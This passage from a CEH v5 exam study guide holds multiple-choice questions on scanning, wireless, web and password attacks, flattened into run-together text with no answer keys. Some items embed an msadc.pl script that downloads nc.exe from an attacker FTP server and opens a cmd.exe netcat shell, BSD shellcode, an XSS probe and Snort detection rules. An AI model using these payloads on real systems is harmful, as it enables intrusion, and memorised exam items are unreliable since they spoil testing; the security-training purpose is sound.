You are performing a port scan on a subnet that has the ICMP protocol blocked. You discover 23 live systems and after

Page 52: 6673158 CEH v5 Exam Study Guide

doing a port scan on each one of them, you notice that they all show port 21 in closed state. What would be the next logicalstep that you would perform?(Select the Best Answer)

Connect to open ports to discover applications Perform a ping sweep to identify any additional systems that might be up Perform a SYN scan on port 21 to identify any additional systems that

might be up Rescan every computer to verify the results

While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLANyou determine that they are using MAC filtering by using ACL's on the access points. What would be the easiest way tocircumvent this and communicate on the WLAN?(Select the Best Answer)

Attempt to crack the WEP key using Airsnort Attempt to brute force the access point and update or delete the MAC

ACL's Steal a client computer and use it to access the wireless network Sniff traffic off the WLAN and spoof your MAC address to the one

that you have captured

While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80.What can you infer from this observation?(Select the Best Answer)

They are using Windows based web servers They are using UNIX based web servers They are not using an Intrusion Detection System They are not using a stateful inspection firewall

You are conducting an IdleScan manually using Hping2. During the scanning process, you notice that almost every queryincrements the IPID - regardless of the port being queried. One or two of the queries cause the IPID to increment by morethan one value. Which of the following options would be a possible reason?(Select the Best Answer)

The zombie you are using is not truly idle A stateful inspection firewall is resetting your queries Hping2 cannot be used for idlescanning

Page 53: 6673158 CEH v5 Exam Study Guide

These ports are actually open on the target system

You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 server. Theserver allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. Youneed to know what your privileges are within the shell. Which of the following options would be your current privileges?(Select the Best Answer)

Administrator IUSR_COMPUTERNAME LocalSystem IIS default installation account

Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )Interesting ports on 192.168.1.1:(The 1592 ports scanned but not shown below are in state: closed)Port State Service21/tcp open ftp25/tcp open smtp80/tcp open http443/tcp open httpsRemote operating system guess: Too many signatures match to reliably guess the OS.Nmap run completed -- 1 IP address (1 host up) scanned in 91.66 secondsWhat can you conclude from the above nmap results?(Select the Best Answer)

The system is a Windows Domain Controller The system is not firewall enabled The system is not running Linux or Solaris The system is not properly patched

You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come toknow that they are enforcing strong passwords. You understand that all users are required to use passwords that are atleast 8 characters in length. All passwords must also use 3 of the 4 following categories: lower case letters, capital letters,numbers and special characters.With your given knowledge of users, likely user account names and the possibility that they will choose the easiest passwordspossible, what would be the fastest type of password cracking attack you can run

Page 54: 6673158 CEH v5 Exam Study Guide

against these hash values and still getresults?(Select the Best Answer)

Encryption Attack Dictionary Attack Brute Force Attack Hybrid Attack

You are having trouble obtaining accurate results while conducting a port scan against a target network. You check for thepresence of any security devices between you and the target system. When both stealth and connect scans do not work,you decide to perform a NULL scan with NMAP. The first few systems scanned shows all ports open. Which one of the followingstatements is most probably true?(Select the Best Answer)

The systems have all ports open The systems are running a host based IDS The systems are Web Servers The systems are running Windows

The programmers on your team are analyzing the free, open source software being used to run FTP services on a serverin your organization. They notice that there is excessive number of functions in the source code that might lead to bufferoverflow. These C++ functions do not check bounds. Identify the line in the source code that might lead to buffer overflow?#include >stdio.h<void stripnl(char *str) {while(strlen(str) && ( (str[strlen(str) - 1] == 13) ||( str[strlen(str) - 1] == 10 ))) {str[strlen(str) - 1] = 0;}}int main() {FILE *infile;char fname[40];char line[100];int lcount;/* Read in the filename */printf("Enter the name of a ascii file: ");fgets(fname, sizeof(fname), stdin);/* We need to get rid of the newline char. */

Page 55: 6673158 CEH v5 Exam Study Guide

stripnl(fname);/* Open the file. If NULL is returned there was an error */if((infile = fopen(fname, "r")) == NULL) {printf("Error Opening File.\n");exit(1);} while( fgets(line, sizeof(line), infile) != NULL ) {/* Get each line from the infile */lcount++;/* print the line number and data */printf("Line %d: %s", lcount, line);}fclose(infile); /* Close the file */}(Select the Best Answer)920173235

A client has approached you with a penetration test requirement. They are concerned with the possibility of external threat,and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibilityof an employee elevating his/her privileges and gaining access to information outside of their department. What kind of penetrationtest would you recommend that would best address the client's concern?(Select the Best Answer)A Black Box testA Black Hat testA Grey Box testA Grey Hat testA White Box testA White Hat test

You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective,you find it tedious to perform extended functions. On further research you come across a perl script that runs the followingmsadc functions:system("perl msadc.pl -h $host -C \"echo open $your <sasfile\"");system("perl msadc.pl -h $host -C \"echo $user<<sasfile\"");

Page 56: 6673158 CEH v5 Exam Study Guide

system("perl msadc.pl -h $host -C \"echo $pass<<sasfile\"");system("perl msadc.pl -h $host -C \"echo bin<<sasfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe<<sasfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html<<sasfile\"");system("perl msadc.pl -h $host -C \"echo quit<<sasfile\"");system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");$o=>STDIN<; print "Opening ...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");What kind of exploit is indicated by this script?(Select the Best Answer)A buffer overflow exploitA SUID exploitA SQL injection exploitA chained exploitA buffer under run exploit Item 24 What is the expected result of the following exploit?#################################################################$port = 53; # Spawn cmd.exe on port X$your = "192.168.1.1"; # Your FTP Server$user = "Anonymous"; # login as$pass = '[email protected]'; # password#################################################################$host = $ARGV[0];print "Starting ...\n";print "Server will download the file nc.exe from $your FTP server.\n";system("perl msadc.pl -h $host -C \"echo open $your <sasfile\"");system("perl msadc.pl -h $host -C \"echo $user<<sasfile\"");system("perl msadc.pl -h $host -C \"echo $pass<<sasfile\"");system("perl msadc.pl -h $host -C \"echo bin<<sasfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe<<sasfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html<<sasfile\"");system("perl msadc.pl -h $host -C \"echo quit<<sasfile\"");print "Server is downloading ...\n";system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");print "Press ENTER when download is finished ... (That's why it's good to have your own ftp server)\n";$o=>STDIN<; print "Opening ...\n";system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");print "Done.\n";#system("telnet $host $port"); exit(0);(Select the Best Answer)Opens up a telnet listener that requires no username or password

Page 57: 6673158 CEH v5 Exam Study Guide

Creates an FTP server with write permissions enabledCreates a share called ''sasfile'' on the target systemCreates an account with a username of Anonymous and a password of [email protected]

While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You would liketo block this, though you do not see any evidence of an attack or other wrong doing. However, you are concerned aboutaffecting the normal functionality of the email server. From the following options choose how best you can achieve this objective?(Select the Best Answer)Block port 25 at the firewallShut off the SMTP service on the serverForce all connections to use a username and passwordSwitch from Windows Exchange to UNIX SendmailNone of the above

While testing web applications, you attempt to insert the following test script into the search area on the company's website:>script<alert('Testing Testing Testing')>/script<Afterwards, when you press the search button, a pop up box appears on your screen with the text ''Testing Testing Testing''. WWhat vulnerability is detected in the web application here?(Select the Best Answer)A buffer overflowPassword attacksCross Site ScriptingA hybrid attackItem 27 Study the snort rule given:alert tcp $EXTERNAL_NET any -< $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established;content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 0000 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin;sid:2192; rev:1;) alert tcp $EXTERNAL_NET any -< $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivatorbind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56;within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5;

Page 58: 6673158 CEH v5 Exam Study Guide

within:12; content:"|05|"; distance:0; within:1; content:"|0b|";distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29;within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193; rev:1;)From the options below, choose the exploit against which this rule applies?(Select the Best Answer)WebDavSQL SlammerMS BlasterIIS Unicode

A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carryuser logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture any logons thoughhe knows that other users are logging on. What do you think is the most likely reason behind this?(Select the Best Answer)There is a NIDS present on that segmentKerberos is preventing itWindows logons cannot be sniffedL0phtcrack only sniffs logons to web servers

While performing a ping sweep of a subnet you receive an ICMP reply of Code 3/Type 13 for all the pings you have sentout. What is the most likely cause behind this?(Select the Best Answer)The firewall is dropping the packetsAn in-line IDS is dropping the packetsA router is blocking ICMPThe host does not respond to ICMP packets

You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However,you don't want to sacrifice reliability for speed. If stealth is not an issue, what kind of scan would you run and yet get veryreliable results?(Select the Best Answer)Stealth scan

Page 59: 6673158 CEH v5 Exam Study Guide

XMAS scanFragmented packet scanConnect scan

A file integrity program such as Tripwire protects against Trojan horse attacks by:(Select the Best Answer)

automatically deleting Trojan horse programs helping you catch unexpected changes to a system utility file that

might indicate it had been replaced by a Trojan horse rejecting packets generated by Trojan horse programs using programming hooks to inform the kernel of Trojan horse behaviour

~DELETED~

You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after asuccessful TCP three way handshake. The server has just received packet #120 from the client. The client has a receivewindow of 200 and the server has a receive window of 250. Within what range of sequence numbers should a packet, sentby the client fall in order to be accepted by the server?(Select the Best Answer)200-250121-371*120-321121-231120-370

While reviewing the results of a scan run against a target network you come across the following:system.sysDescr.0 : DISPLAY STRING- (ascii): Cisco Internetwork OperatingSystem SoftwareIOS (tm) 4500 Software (C4500-IS-M),Version 12.0(9), RELEASE SOFTWARE (fc1)Copyright (c) 1986-2000 by cisco Systems, Inc.Compiled Tue 25-Jan-00 04:28by bettylsystem.sysObjectID.0 : OBJECT IDENTIFIER:.iso.org.dod.internet.private.enterprises.cisco.catProd.cisco4700system.sysUpTime.: Timeticks: (156398017) 18 days, 2:26:20.17system.sysContact.0 : DISPLAY STRING- (ascii):system.sysName.0 : DISPLAYSTRING- (ascii): somerrouternamesystem.sysLocation.0 : DISPLAY STRING- (ascii):system.sysServices.0 : INTEGER:6system.sysORLastChange.0 : Timeticks: (0) 0:00:00.00What was used to obtain this output?

Page 60: 6673158 CEH v5 Exam Study Guide

(Select the Best Answer)A Bo2k system querynmap protocol/port scanHping2 diagnosisAn SNMP walk

While performing ping scans into a target network you get a frantic call from the organization's security team. They reportthat they are under a denial of service attack. When you stop your scan, the smurf attack event stops showing up on theorganization's IDS monitors. How can you modify your scan to prevent triggering this event in the IDS?(Select the Best Answer)Scan more slowlyDo not scan the broadcast IPSpoof the source IP addressOnly scan the Windows systems

Using PKI, When Alice wishes to send a secret message to Bob, she looks up Bob's public key in a directory, uses it toencrypt the message and sends it off. Bob then uses his private key to decrypt the message and read it. No one listeningin can decrypt the message. Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although manypeople may know the public key of a Bob and use it to verify Bob's signatures, they cannot discover Bob's private key anduse it to forge digital signatures. This is referred to as the principle of:(Select the Best Answer)IrreversibilityNon-repudiationSymmetryAsymmetry

You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-huntingsites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?(Select the Best Answer)The IP range used by the target networkAn understanding of the number of employees in the companyHow strong the corporate security policy is

Page 61: 6673158 CEH v5 Exam Study Guide

The types of operating systems and applications being used

Bob waits near a secured door, holding a box. He waits until an employee walks up to the secured door and uses the specialcard in order to access the restricted area of the target company. Just as the employee opens the door, Bob walks up tothe employee (still holding the box) and asks the employee to hold the door open so that he can enter. What is the bestway to undermine the social engineering activity of tailgating?(Select the Best Answer)

issue special cards to access secured doors at the company and provide a one-time only brief description of use of the special

card to post a sign that states ''no tailgating'' next to the special card reader

adjacent to the secured door setup a mock video camera next to the special card reader adjacent to the

secured door to educate all of the employees of the company on best security

practices on a recurring basis

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As userssend authentication data, you are able to capture it. What kind of attack is this?(Select the Best Answer)Rogue access point attackUnauthorized access point attackDrive by hackingWEP attack

Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure datafrom specific threats, but it does not secure the application from coding errors. It can provide data privacy, integrity and enablestrong authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bobcan use to explain to the management how encryption will not address all their security concerns?(Select the Best Answer)

Bob can explain that a random generator can be used to derive cryptographic keys but it uses a weak seed value and it

is a form of a programming error Bob can explain that by using passwords to derive cryptographic keys it is

Page 62: 6673158 CEH v5 Exam Study Guide

a form of a programming error Bob can explain that a buffer overrun is an example of programming

error and it is a common mistake associated with poor programming technique Bob can explain that by using a weak key management technique it is a

form of a programming error

During the intelligence gathering phase of a penetration test, you discover a press release by a security products vendorstating that they have signed a multi-million dollar agreement with the company you are targeting. The contract was for vulnerabilityassessment tools and network based IDS systems.While researching on that particular brand of IDS you notice that its default installation allows it to perform sniffing and attackanalysis on one NIC and caters to its management and reporting on another NIC. The sniffing interface is completely unboundfrom the TCP/IP stack by default. Assuming the defaults were used, how can you detect these sniffing interfaces?(Select the Best Answer)

Use a ping flood against the IP of the sniffing NIC and look for latency in the responses

Send attack traffic and look for it to be dropped by the IDS Set your IP to that of the IDS and look for it to begin trying to knock your

computer off the network The sniffing interface cannot be detected

In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his accesspoints require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network.Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible?(Select the Best Answer)Bob forgot to turn off DHCPAll access points are shipped with a default SSIDThe SSID is still sent inside both client and AP packetsBob's solution only works in ad-hoc mode

In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications he is using in

Page 63: 6673158 CEH v5 Exam Study Guide

his office. Soon after the implementation, users begin complaining about the wireless network slowing down. After benchmarkingthe network's speed, Bob discovers that throughput has dropped by almost half, even though the number of users has remainedthe same. What do you think is the reason behind this?(Select the Best Answer)The stronger encryption used by the VPN slows down the networkUsing a VPN with wireless doubles the overhead on an access point for all direct client to access point communicationsVPNs use larger packets than wireless networks normally doUsing a VPN on wireless automatically enables WEP, which causes additional overhead

In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antenna positioning. He places the antennasfor the access points near the center of the building. For those access points near the outer edge of the building he usessemi-directional antennas that face towards the buildings center. There is a large parking lot and outlying field surroundingthe building that extends out half a mile around the building. Bob figures that with this and his placement of antennas, hiswireless network will be safe from attack. Which of the following statements is true?(Select all that apply)

With the 300 foot limit of a wireless signal, Bob's network is safe Wireless signals can be detected from miles away; Bob's network is

not safe Bob's network will be safe but only if he doesn't switch to 802.11a Bob's network will not be safe until he also enables WEP

Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implementa policy of not allowing any wireless devices on the network. What other steps does Bob need to take to successfully implementthis?(Select all that apply)Train users in the new policyDisable all wireless protocols at the firewallDisable SNMP on the network so wireless devices cannot be configuredContinuously survey the area for wireless devicesPurchase a device that jams wireless signals

Page 64: 6673158 CEH v5 Exam Study Guide

You wish to determine the operating system and type of web server being used. At the same time you wish to arouse nosuspicion within the target organization. While some of the methods listed below will work, which holds the least risk of detection?(Select the Best Answer)Make some phone calls and attempt to retrieve the information using social engineeringUse nmap in paranoid mode and scan the web serverTelnet to the web server and issue commands to illicit a responseUse the netcraft web site to look for the target organization's web application

An attacker has been successfully modifying the purchase price of items purchased at a web site. The security administratorsverify the web server and Oracle database have not been compromised directly. They have also verified the IDS logs andfound no attacks that could have caused this. What is the mostly likely way the attacker has been able to modify the price?(Select the Best Answer)By changing hidden form values in a local copy of the web pageBy using cross site scriptingBy using SQL injectionThere is no way the attacker could do this without directly compromising either the web server or the database

You are the security administrator for a large network. You want to prevent attackers from running any sort of tracerouteinto your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?(Select the Best Answer)Block ICMP at the firewallBlock UDP at the firewallBoth A and B aboveThere is no way to completely block tracerouting into this area

You are attempting to map out the firewall policy for an organization. You discover your target system is one hop beyondthe firewall. Using hping2, you send SYN packets with the exact TTL of the target system starting at port 1 and going up

Page 65: 6673158 CEH v5 Exam Study Guide

to port 1024. What is this process known as?(Select the Best Answer)FootprintingFirewalkingEnumerationIdle scanning

Jim's organization just completed a major Linux roll out and now all of the organization's systems are running the Linux 2.5kernel. The roll out expenses has posed constraints on purchasing other essential security equipment and software. Theorganization requires an option to control network traffic and also perform stateful inspection of traffic going into and outof the DMZ. Which built-in functionality of Linux can achieve this?(Select the Best Answer)IP TablesIP ChainsIP SnifferIP ICMP

Jim was having no luck performing a penetration test on his company's network. He was running the test from home andhad downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems, andthe exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems?(Select the Best Answer)Security scanners are not designed to do testing through a firewallSecurity scanners cannot perform vulnerability linkageSecurity scanners are only as smart as their database and cannot find unpublished vulnerabilitiesAll of the above

An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't want to get caught and isspoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system. The attacker rechecksthat the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connectto the target system. What could be the reason?(Select the Best Answer)The firewall is blocking port 23 to that system

Page 66: 6673158 CEH v5 Exam Study Guide

He cannot spoof his IP and successfully use TCPHe needs to use an automated tool to telnet inHe is attacking an operating system that does not reply to telnet even when open

Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactiveshell and plans to deface the main web page. He first attempts to use the ''Echo'' command to simply overwrite index.htmland remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwriteit with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem?(Select the Best Answer)The system is a honeypotThere is a problem with the shell and he needs to run the attack againYou cannot use a buffer overflow to deface a web pageThe HTML file has permissions of read only

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect'sworkstation. He comes across a file that is just called ''file.txt'' but when he opens it, he finds the following:#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)<<8),(((x)&0xff0000)<<16),(((x)&0xff000000)<<24)char infin_loop[]= /* for testing purposes */"\xEB\xFE";char bsdcode[] = /* Lam3rZ chroot() code by venglin */"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43""\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0""\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0""\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80""\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9""\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75""\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd""\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46""\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56""\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53""\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30""\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e""\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];static char *magic_str=NULL;int before_len=0;What can he infer from this file?

Page 67: 6673158 CEH v5 Exam Study Guide

(Select the Best Answer)A picture that has been renamed with a .txt extensionAn encrypted fileA uuencoded fileA buffer overflow

During the scanning portion of his penetration test, Ed discovered a handful of Oracle servers. Later, Ed found that thoseOracle servers were being used by the web servers to retrieve information. Ed decided that he should try some SQL injectionattacks in order to read information out of the Oracle servers. He opens the web page in his browser and begins injectingcommands. After hours of attempts, Ed is having no luck getting even a small amount of information out of the databases.What is the probable cause of this?(Select the Best Answer)You cannot do SQL injection against Oracle databaseYou must directly connect to the database instead of using the web serverYou cannot use a web browser to perform SQL injectionEd is not using SQL Plus to inject commands

Fingerprinting an Operating System helps a cracker because:(Select the Best Answer)It defines exactly what software you have installedIt opens a security-delayed window based on the port being scannedIt informs the cracker of which vulnerabilities he may be able to exploit on your systemIt doesn't depend on the patches that have been applied to fix existing security holes

A program that defends against a port scanner will attempt to:(Select the Best Answer)Update a firewall rule in real time to prevent the port scan from being completedSends back bogus data to the port scannerLimit access by the scanning system to publicly available ports onlyLog a violation and recommend use of security-auditing tools

A distributed port scan operates by:(Select the Best Answer)using denial-of-service software against a range of TCP portshaving multiple computers each scan a small number of ports, then correlating the results

Page 68: 6673158 CEH v5 Exam Study Guide

blocking access to the targeted host by each of the distributed scanning clientsblocking access to the scanning clients by the targeted host

An nmap command that includes the host specification of 202.176.56-57.* will scan _______ number of hosts. (Choosethe best answer)(Select the Best Answer)5122256Over 10,000

You are concerned that someone running PortSentry could block your scans, and you decide to slow your scans so thatno one detects them. Which of the following command will help you achieve this?(Select the Best Answer)nmap -sF -PT -PI -O >ip address<nmap -sS -PT -PI -O -T1 >ip address<nmap -sO -PT -O -C5 >ip address<nmap -sF -P0 -O >ip address<

A majority of attacks come from insiders, people who have direct access to a company's computer system as part of theirjob function or a business relationship. Who is considered an insider?(Select the Best Answer)A competitor to the company because they can directly benefit from the publicity generated by making such an attackThe CEO of the company because he has access to all of the computer systemsDisgruntled employee, customers, suppliers, vendors, business partners, contractors, temps, and consultantsA government agency since they know the company's computer system strengths and weaknesses

Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to preventlegitimate users from gaining access. What type of attack is Henry using?(Select the Best Answer)Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or executecommandsHenry is executing commands or viewing data outside the intended target path

Page 69: 6673158 CEH v5 Exam Study Guide

Henry is using a denial of service attack which is a valid threat used by an attackerHenry is taking advantage of an incorrect configuration that leads to access with higher-than-expected privilege

Bret is a web application administrator and has just read that there are a number of surprisingly common web applicationvulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet.He has also read that when an organization deploys a web application, they invite the world to send HTTP requests. Attacksburied in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are insidelegal HTTP requests. Bret is determined to weed out any vulnerabilities. What are some common vulnerabilities in web applicationsthat he should be concerned about?(Select the Best Answer)Un-validated parameters, broken access control, broken account and session management, cross-side scripting and bufferoverflows are just a few common vulnerabilitiesVisible clear text passwords, anonymous user account set as default, missing latest security patch, no firewall filters setand no SSL configured are just a few common vulnerabilitiesNo SSL configured, anonymous user account set as default, missing latest security patch, no firewall filters set and an inattentivesystem administrator are just a few common vulnerabilitiesNo IDS configured, anonymous user account set as default, missing latest security patch, no firewall filters set and visibleclear text passwords are just a few common vulnerabilities

Jimmy an attacker knows that he can take advantage of poorly designed input validation routines to create or alter SQLcommands to gain access to unintended data or execute commands in the database. What technique does this describethat Jimmy is willing to use to compromise a database?(Select the Best Answer)Jimmy can submit user input that executes an operating system command to compromise a target systemJimmy can utilize this particular database threat which is a SQL injection technique to penetrate a target systemJimmy can gain control of system to flood the target system with requests, preventing legitimate users from gaining accessJimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database

Page 70: 6673158 CEH v5 Exam Study Guide

June, a security analyst, understands that a polymorphic virus has the ability to mutate and can change its known viral signatureand hide from signature-based antivirus programs. How can June use an antivirus program in this case and would it beeffective against a polymorphic virus?(Select the Best Answer)Yes. June can use an antivirus program since it compares the parity bit of executable files to the database of known checksum counts and it is effective on a polymorphic virusYes. June can use an antivirus program since it compares the signatures of executable files to the database of known viralsignatures and it is very effective against a polymorphic virusNo. June can't use an antivirus program since it compares the signatures of executable files to the database of known viralsignatures and in the case the polymorphic viruses cannot be detected by a signature-based anti-virus programNo. June can't use an antivirus program since it compares the size of executable files to the database of known viral signaturesand it is effective on a polymorphic virus

Rebecca is a security analyst and is savvy of a well known local root exploit that has the ability of enabling local users touse available exploits to gain root privileges. This vulnerability exploits a condition in the Linux kernel within the execve()system call. There is no known workaround that exists for this vulnerability. What is the correct action to be taken by Rebeccain this situation as a recommendation to management?(Select the Best Answer)Rebecca should make a recommendation to disable the execve() system callRebecca should make a recommendation to upgrade the Linux kernel promptlyRebecca should make a recommendation to set all child-process to sleep within the execve()Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure thateach child process can't elevate privilege

Statistics from cert.org and other leading security organizations has clearly showed a steady increase in the number of hackingincidents against companies. What do you think is the main reason we have seen such a huge increase in hacking attemptsover the past years?

Page 71: 6673158 CEH v5 Exam Study Guide

(Select the Best Answer)it is getting harder to hack and more challenging for non technical peopleincrease in processing powernew TCPIP stack features are constantly being addedthe ease of getting hacker tools on the Internet

What does the term ''Ethical Hacking'' mean?(Select the Best Answer)Someone who is hacking for ethics reasonsSomeone who is using their skills for ethics reasonsSomeone who is using their skills for defensive purposesSomeone who is using their skills for offensive purposes

What is the key difference between an 'Ethical Hacker' and a 'Cracker'?(Select the Best Answer)The ethical hacker does not use the same techniques or skillsThe ethical hacker does it strictly for financial motivesThe ethical hacker has authorization from the owner of the targetThe ethical hacker is just a cracker that is getting paidEthical Hacking and Countermeasures v3

Which of the following best describes Vulnerability?(Select the Best Answer)A weakness or error that can lead to a compromiseAn agent that could take advantage of a weaknessAn action or event that might prejudice securityThe loss potential of a threat

When a malicious hacker identifies a target and wants to eventually compromise this target, what would be the first stepthe attacker would perform?(Select the Best Answer)Cover his tracks by eradicating the log filesGain access to the remote computer for identification of venue of attacksPerform a reconnaissance of the remote target for identification of venue of attacksAlways starts with a scan in order to quickly identify venue of attacks

What does the term 'Hacktivism' means?(Select the Best Answer)Someone that has an urge to constantly hack

Page 72: 6673158 CEH v5 Exam Study Guide

Someone who is hacking for a causeSomeone who has at least 12 years of hacking experienceSomeone who subscribe to hacker's magazine ‘]What are the three phases of security testing?(Select the Best Answer)Preparation, Conduct, ConclusionPreparation, Scans, ConclusionReconnaissance, Scans, ReportingPreparation, Conduct, BillingEthical Hacking and Countermeasures v3

Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get fromthe client before commencing his test?(Select the Best Answer)IP Range, OS, and patches installedOnly the IP address rangeNothing but corporate nameAll that is available from the client

Which of the following activities would not be considered passive footprinting?(Select the Best Answer)Go through the rubbish to find out any information that might have been discardedSearch on financial site such as Yahoo FinancialScan the range of IP address found in their DNS databasePerform multiple queries through a search engine

What are the four existing Regional Internet Registry (RIR's)?(Select the Best Answer)APNIC, PICNIC, ARIN, LACNICRIPE NCC, LACNIC, ARIN, APNICRIPE NCC, NANIC, ARIN, APNICRIPE NCC, ARIN, APNIC, LATNIC

When referring to the Domain Name Service, what is a 'zone'?(Select the Best Answer)It is the first domain that belong to a company

Page 73: 6673158 CEH v5 Exam Study Guide

It is a collection of resource recordsIt is the first resource record type in the SOAIt is a collection of domains

How does traceroute map the route a packet travels from point A to point B?(Select the Best Answer)It uses a TCP timestamp packet that will illicit a time exceeded in transit messageIt uses a protocol that will be rejected by gateways on it's way to the destinationIt manipulates the value of the time to live (TTL) within packet to illicit a time exceeded in transit messageIt manipulates the flags within packets to force gateways into generating error messages

What is the purpose of firewalking?(Select the Best Answer)It's a technique used to discover Wireless network on footIt's a technique used to map routers on a network linkIt's a technique used to discover what rules are configured on a gatewayIt's a technique used to discover interface in promiscuous mode

Which of the following would be the best reason for sending a single SMTP message to an address that does not exist withinthe target company?(Select the Best Answer)To create a denial of service attackTo verify information about the Mail administratorTo gather information about internal hosts used in email treatmentTo gather information about procedure in place to deal with such messages

War dialing is a very old attack as it was depicted in movies that were made years ago. Why would a modern security testerconsider making use of such an old technique?(Select the Best Answer)It is cool, if it works in movie it must work in real lifeIt allows circumvention of protection mechanisms by being on the internal networkIt allows circumvention of company PBXA good security tester would not use such a derelict technique

What sequence of packets is sent during the initial TCP three way handshake?

Page 74: 6673158 CEH v5 Exam Study Guide

(Select the Best Answer)FIN, FIN-ACK, ACKSYN, URG, ACKSYN, ACK, SYN-ACKSYN, SYN-ACK, ACK

Nathalie would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point.Which of the following type of scans would be the most accurate and reliable?(Select the Best Answer)A half-scanA UDP scanA TCP Connect scanA FIN scan

In the context of Windows Security, what is a 'null' user?(Select the Best Answer)A user that has no skillspseudo account that has no username and passwordan account that has been suspended by the adminpseudo account that was created for security administration purpose

Jack is conducting a port scan of a target network. He knows that his client target network has a web server and that a mailserver is up and running. Jack has been sweeping the network but has not been able to get any responses from the remotetarget. Which of the following could be likely cause of the lack of response?(Select all that apply)UDP is filtered by a gatewayThe packet TTL value is too low and cannot reach the targetThe host might be downThe destination network might be downThe TCP window size does not matchICMP is filtered by a gateway

Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. While doinga port scan she notices ports open in the 135 to 139 range. What protocol is most likely to be listening on those ports?(Select the Best Answer)FingerFTP

Page 75: 6673158 CEH v5 Exam Study Guide

SambaSMB

Bryce is using the nslookup command to craft queries to list all DNS information (such as Name Servers, host names, MXrecords, CNAME records, glue records (delegation for child Domains), zone serial number, Time To Live (TTL) records,etc) for a Domain. What type of function is Bryce trying to accomplish?(Select the Best Answer)A zone harvestingA zone transferA zone updateA zone estimate

